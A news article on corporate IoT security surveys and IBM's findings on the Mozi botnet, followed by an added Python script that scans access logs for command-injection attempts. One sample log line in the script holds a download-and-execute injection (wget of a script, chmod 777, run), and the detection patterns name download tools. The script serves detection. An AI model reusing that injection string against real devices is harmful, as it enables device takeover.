An odd range of internet-connected devices, including medical devices, kitchen appliances, coffee machines, sports equipment, and desk toys, are appearing on some corporate networks according to a recent survey of IT decision-makers.
The survey — sponsored by Palo Alto Networks — suggests IT leaders aren’t quite sure if they have a handle on every Internet-of-Things device in their environment.
Separately, IBM reports that a new botnet of infected IoT devices — mainly commercial routers — is accounting for an increased percentage of IoT-based botnet traffic. The report, released Thursday, says nearly 90 per cent of the observed IoT network traffic from October 2019 through June came from what it dubs the Mozi botnet.
IBM calls the leap a “startling takeover” of the percentage of traffic from such well-known IoT botnets as Mirai. It was accompanied by a huge increase in overall IoT botnet activity, which the report says suggests Mozi did not remove competitors from the market. Instead, it flooded it.
Depending on the definition, IBM estimates there are about 31 billion IoT devices deployed around the globe, and the IoT deployment rate is now 127 devices per second. IoT devices can include consumer (toys, cameras), commercial (everything from healthcare monitors to sensors in supply chains), enterprise (routers, projectors) and industrial (logic controllers in factories and pipelines) products.
IBM research suggests Mozi continues to be successful largely through the use of command injection (CMDi) attacks, which often result from the misconfiguration of IoT devices, the report says. Weak telnet passwords are a contributing factor. Using a “wget” shell command, threat actors alter permissions so they can interact with the affected system.
Once the attacker gains full access to the device through the botnet, the firmware level can be changed and additional malware can be planted on the device. Mozi can conduct DDoS attacks (HTTP, TCP, UDP); carry out command execution attacks; download malicious payloads from specified URLs and execute them; and gather bot information.
Among the devices IBM found vulnerable to Mozi are routers from Huawei, Netgear and D-Link, units built on a software development kit from Realtek, GPON routers for the optical networks used by carriers and — as usual — internet-connected TV cameras and digital recorders.
“Command injection remains the primary infection vector of choice for threat actors, reiterating how important it is to change default device settings and use effective penetration testing to find and fix gaps in the armour,” says the IBM report.
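As an added illustration of the detection side of the command-injection vector described above (this script is not from the IBM report or this article), here is a small Python triage routine that scans web-server access-log lines from a hypothetical device management interface and flags requests in which a shell separator is followed by a download tool or a permission change. The log lines, addresses and CGI paths are constructed samples.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Common Log Format) from a hypothetical
# router management port. The third line is a constructed injection attempt.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jul/2020:03:12:07 +0000] "GET /index.html HTTP/1.1" 200 512
203.0.113.9 - - [10/Jul/2020:03:12:09 +0000] "POST /cgi-bin/device_cfg HTTP/1.1" 200 88
198.51.100.7 - - [10/Jul/2020:03:13:41 +0000] "GET /setup.cgi?ntp=pool.ntp.org;wget%20http://198.51.100.7/x.sh%20-O%20/tmp/x.sh;chmod%20777%20/tmp/x.sh;/tmp/x.sh HTTP/1.1" 200 0
198.51.100.7 - - [10/Jul/2020:03:13:42 +0000] "POST /cgi-bin/ping.cgi HTTP/1.1" 200 0
"""

CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Shell separators that let a second command ride on an injected parameter value.
# A lone '&' is a normal query-string delimiter, so only '&&' is treated as a separator.
SEPARATORS = re.compile(r'[;|`]|&&|\$\(')
# Fetch tools typically used to pull a payload onto a device, and the chmod that
# "alters permissions" so the payload can be executed.
DOWNLOADERS = re.compile(r'\b(wget|curl|tftp|ftpget)\b')
PERM_CHANGE = re.compile(r'\bchmod\s+[0-7]{3,4}\b')

def decoded_target(target):
    # Decode twice: double-encoding is a simple way to slip past single-pass filters.
    return unquote_plus(unquote_plus(target))

def classify(target):
    """Return a reason string if the request target looks like a command-injection
    download-and-execute attempt, otherwise None."""
    t = decoded_target(target)
    if '?' not in t:
        return None
    query = t.split('?', 1)[1]
    sep = SEPARATORS.search(query)
    if not sep:
        return None
    tail = query[sep.end():]          # only what follows the first separator counts
    reasons = []
    if DOWNLOADERS.search(tail):
        reasons.append('downloader after shell separator')
    if PERM_CHANGE.search(tail):
        reasons.append('permission change after shell separator')
    return '; '.join(reasons) or None

def scan(log_text):
    """Parse CLF lines and return (client_ip, path, reason) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue                  # skip lines that are not valid CLF
        reason = classify(m['target'])
        if reason:
            path = decoded_target(m['target']).split('?', 1)[0]
            findings.append((m['ip'], path, reason))
    return findings
```

Pattern matching of this kind is a triage aid for spotting the infection attempts the report describes, not a substitute for changing default credentials and closing the management interface to untrusted networks.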
As many as 95 per cent of respondents to the Palo Alto survey said they have visibility of all the IoT devices on their networks. Yet 41 per cent of respondents agreed they need to make a lot of improvements to the way they approach IoT security. Another 17 per cent felt a complete overhaul is needed.
The survey polled 1,350 IT business decision-makers at organizations with at least 1,000 employees in 14 countries across Asia, Europe, the Middle East and North America.
The report’s authors argue “IoT is the soft underbelly of many businesses and an area they need to do more to protect.”
Only one in five (21 per cent) of those surveyed said their organizations have segmented their networks to contain IoT devices in their own tightly controlled security zones.
“Devices that employees innocently bring onto an organization’s network are often not built with security in mind, and can be easy gateways to a company’s most important information and systems,” May Wang, senior distinguished engineer at Palo Alto Networks said in a statement. “To address that threat, security teams need to be able to spot new devices, assess their risk, determine their normal behaviours and quickly apply security policies.”
The company recommends IT departments:
- Employ device discovery for complete visibility. The first thing businesses need to do is get visibility into the exact number and types of devices on their networks, keeping a detailed, up-to-date inventory of all connected IoT assets, their risk profiles, and their trusted behaviours.
- Apply network segmentation for stronger defence. Businesses should divide their networks into subsections to enable granular control over lateral movement of traffic between devices and workloads, reducing the attack surface. Virtual local area network (VLAN) configurations and next-generation firewall policies should be used to keep IoT assets and IT assets separate.
- Adopt secure password practices. Strong password security is fundamental to securing IoT devices. As soon as an IoT device is connected to the network, the IT team should replace the weak default password with a secure one that aligns with the organization’s password policies.
- Continue to patch and update firmware when available. Most IoT devices are not designed to patch security flaws regularly, so it is critical that IT teams ensure devices are regularly patched for known vulnerabilities. To avoid data loss, add dedicated IoT-aware file and web threat prevention as well as virtual patching capabilities via intrusion prevention.
- Actively monitor IoT devices at all times. Traditional endpoint security solutions require software agents that IoT devices are not designed to take. Organizations should implement real-time monitoring to continuously analyze the behaviour of all network-connected IoT endpoints by integrating existing security postures with their next-generation firewall.